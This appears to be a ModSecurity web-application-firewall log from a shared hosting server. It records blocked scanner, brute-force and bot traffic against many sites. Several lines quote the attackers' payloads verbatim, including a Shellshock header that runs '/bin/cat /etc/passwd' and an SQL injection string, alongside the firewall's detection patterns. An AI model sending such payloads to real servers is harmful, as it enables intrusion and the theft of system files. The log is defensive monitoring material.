[Tue May 26 12:51:00.943524 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9zAAAABg"]
[Tue May 26 12:51:03.707140 2026] [security2:error] [pid 448967:tid 449146] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ3-XLPuWQsfM-UVS-KQAAADE"]
[Tue May 26 12:51:04.043658 2026] [security2:error] [pid 448967:tid 449102] [client 78.46.215.1:17332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVJ3-XLPuWQsfM-UVS-LQAAAAU"], referer: https://thegoodsporting.com
[Tue May 26 12:51:05.098665 2026] [core:error] [pid 448967:tid 449211] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:05.098703 2026] [core:error] [pid 448967:tid 449211] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:05.098821 2026] [security2:error] [pid 448967:tid 449211] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVJ4eXLPuWQsfM-UVS-XQAAAHI"]
[Tue May 26 12:51:05.099460 2026] [security2:error] [pid 448967:tid 449178] [client 195.178.110.34:51660] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ4eXLPuWQsfM-UVS-WgAAAFE"]
[Tue May 26 12:51:05.903072 2026] [security2:error] [pid 448967:tid 449098] [client 74.7.230.32:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.juniorwoodies.glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVJ4eXLPuWQsfM-UVS-dAAAAAE"]
[Tue May 26 12:51:05.917936 2026] [security2:error] [pid 448967:tid 449223] [client 74.7.230.32:40860] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.juniorwoodies.glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVJ4eXLPuWQsfM-UVS-cAAAfiw"]
[Tue May 26 12:51:06.491976 2026] [security2:error] [pid 448967:tid 449196] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ4uXLPuWQsfM-UVS-egAAAGM"]
[Tue May 26 12:51:09.182039 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ5OXLPuWQsfM-UVS-uAAAABg"]
[Tue May 26 12:51:10.559493 2026] [security2:error] [pid 448967:tid 449213] [client 23.94.40.119:34730] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/seeyon/htmlofficeservlet"] [unique_id "ahVJ5uXLPuWQsfM-UVS-7AAAAHQ"]
[Tue May 26 12:51:10.597817 2026] [security2:error] [pid 448967:tid 449147] [client 23.94.40.119:34698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:ostype. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:ostype"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vpn/user/download/client"] [unique_id "ahVJ5uXLPuWQsfM-UVS-9QAAADI"]
[Tue May 26 12:51:10.599040 2026] [security2:error] [pid 448967:tid 449123] [client 23.94.40.119:34680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:fileNames[]. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:fileNames[]"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/export/classroom-course-statistics"] [unique_id "ahVJ5uXLPuWQsfM-UVS-9gAAABo"]
[Tue May 26 12:51:10.619780 2026] [security2:error] [pid 448967:tid 449115] [client 23.94.40.119:34738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/general/index/UploadFile.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-7QAAABI"]
[Tue May 26 12:51:10.619904 2026] [security2:error] [pid 448967:tid 449157] [client 23.94.40.119:34772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/scripts/setup.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-8AAAADw"]
[Tue May 26 12:51:10.637763 2026] [security2:error] [pid 448967:tid 449212] [client 23.94.40.119:34580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/public/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS--AAAAHM"]
[Tue May 26 12:51:10.638227 2026] [security2:error] [pid 448967:tid 449102] [client 23.94.40.119:34626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet"] [unique_id "ahVJ5uXLPuWQsfM-UVS--wAAAAU"]
[Tue May 26 12:51:10.638257 2026] [security2:error] [pid 448967:tid 449182] [client 23.94.40.119:34596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php/User/doLogin"] [unique_id "ahVJ5uXLPuWQsfM-UVS--gAAAFU"]
[Tue May 26 12:51:10.640191 2026] [security2:error] [pid 448967:tid 449223] [client 23.94.40.119:34650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dataSetParam/verification;swagger-ui/"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AAAAAH4"]
[Tue May 26 12:51:10.640230 2026] [security2:error] [pid 448967:tid 449098] [client 23.94.40.119:34612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:lang. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:lang"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ5uXLPuWQsfM-UVS-_AAAAAE"]
[Tue May 26 12:51:10.641270 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:34776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-6wAAAAo"]
[Tue May 26 12:51:10.641435 2026] [security2:error] [pid 448967:tid 449185] [client 23.94.40.119:34648] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\\\\*|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\\\\*| |\\\\{|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]|\\\\bunion\\\\b.{1,256}?select.{1,256}[a-z0-9\\\\(\\\\)].{1,256}(?:from|#| ..." at ARGS:id. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "296"] [id "340016"] [rev "46"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  SQL injection attempt detected"] [data "union select md5(999999999) as id from"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upgrade/detail.jsp/login/LoginSSO.jsp"] [unique_id "ahVJ5uXLPuWQsfM-UVS-_wAAAFg"]
[Tue May 26 12:51:10.649834 2026] [security2:error] [pid 448967:tid 449135] [client 23.94.40.119:34788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-8QAAACY"]
[Tue May 26 12:51:10.737734 2026] [core:error] [pid 448967:tid 449119] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:10.737765 2026] [core:error] [pid 448967:tid 449119] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:10.737917 2026] [security2:error] [pid 448967:tid 449119] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_BAAAABY"]
[Tue May 26 12:51:10.738686 2026] [security2:error] [pid 448967:tid 449195] [client 195.178.110.34:51666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AQAAAGI"]
[Tue May 26 12:51:10.754679 2026] [security2:error] [pid 448967:tid 449144] [client 23.94.40.119:34814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zentao/user-login.html"] [unique_id "ahVJ5uXLPuWQsfM-UVS_CAAAAC8"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/zentao/user-login.html
[Tue May 26 12:51:10.880061 2026] [security2:error] [pid 448967:tid 449206] [client 157.20.138.61:53406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AwAAAG0"]
[Tue May 26 12:51:10.880321 2026] [security2:error] [pid 448967:tid 449206] [client 157.20.138.61:53406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AwAAAG0"]
[Tue May 26 12:51:11.103531 2026] [security2:error] [pid 448967:tid 449127] [client 23.94.40.119:34796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_DwAAAB4"]
[Tue May 26 12:51:11.658067 2026] [security2:error] [pid 448967:tid 449222] [client 23.94.40.119:34844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lcms/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JQAAAH0"]
[Tue May 26 12:51:11.658506 2026] [security2:error] [pid 448967:tid 449219] [client 23.94.40.119:34826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/images/logo/logo-eoffice.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JgAAAHo"]
[Tue May 26 12:51:11.828312 2026] [security2:error] [pid 448967:tid 449030] [remote 45.55.33.147:50810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.33.55.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JAAAcz4"]
[Tue May 26 12:51:12.003295 2026] [security2:error] [pid 448967:tid 449111] [client 23.94.40.119:34884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:lang. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:lang"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6OXLPuWQsfM-UVS_LQAAAA4"]
[Tue May 26 12:51:12.025949 2026] [security2:error] [pid 448967:tid 449134] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_IgAAACU"]
[Tue May 26 12:51:12.892431 2026] [security2:error] [pid 448967:tid 449025] [remote 84.247.129.9:57312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVJ6OXLPuWQsfM-UVS_PgAACzk"]
[Tue May 26 12:51:13.230902 2026] [security2:error] [pid 448967:tid 449050] [remote 167.172.25.98:55506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_RgAAdlI"]
[Tue May 26 12:51:13.434024 2026] [security2:error] [pid 448967:tid 449129] [client 23.94.40.119:34966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_VAAAACA"]
[Tue May 26 12:51:13.434175 2026] [security2:error] [pid 448967:tid 449129] [client 23.94.40.119:34966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_VAAAACA"]
[Tue May 26 12:51:13.572933 2026] [security2:error] [pid 448967:tid 449148] [client 23.94.40.119:34988] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx"] [unique_id "ahVJ6eXLPuWQsfM-UVS_WQAAADM"]
[Tue May 26 12:51:13.645418 2026] [security2:error] [pid 448967:tid 449135] [client 23.94.40.119:35004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/backupmgt/localJob.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_XAAAACY"]
[Tue May 26 12:51:13.874771 2026] [security2:error] [pid 448967:tid 449195] [client 23.94.40.119:35020] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6eXLPuWQsfM-UVS_YwAAAGI"]
[Tue May 26 12:51:14.226889 2026] [security2:error] [pid 448967:tid 449206] [client 23.94.40.119:35068] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_bQAAAG0"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.235312 2026] [security2:error] [pid 448967:tid 449105] [client 23.94.40.119:35036] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6uXLPuWQsfM-UVS_bgAAAAg"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384527 2026] [security2:error] [pid 448967:tid 449193] [client 23.94.40.119:35092] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test-cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cgAAAGA"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384641 2026] [security2:error] [pid 448967:tid 449151] [client 23.94.40.119:35104] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cwAAADY"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384933 2026] [security2:error] [pid 448967:tid 449143] [client 23.94.40.119:35052] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/status"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dQAAAC4"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384923 2026] [security2:error] [pid 448967:tid 449116] [client 23.94.40.119:35082] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/test.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dAAAABM"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.385189 2026] [security2:error] [pid 448967:tid 449221] [client 23.94.40.119:35058] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/stats"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dgAAAHw"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.385193 2026] [security2:error] [pid 448967:tid 449146] [client 23.94.40.119:35064] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test"] [unique_id "ahVJ6uXLPuWQsfM-UVS_dwAAADE"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.385792 2026] [security2:error] [pid 448967:tid 449160] [client 23.94.40.119:35086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/debug.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_eAAAAD8"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.389569 2026] [security2:error] [pid 448967:tid 449172] [client 23.94.40.119:35110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/backupmgt/pre_connect_check.php"] [unique_id "ahVJ6uXLPuWQsfM-UVS_eQAAAEs"]
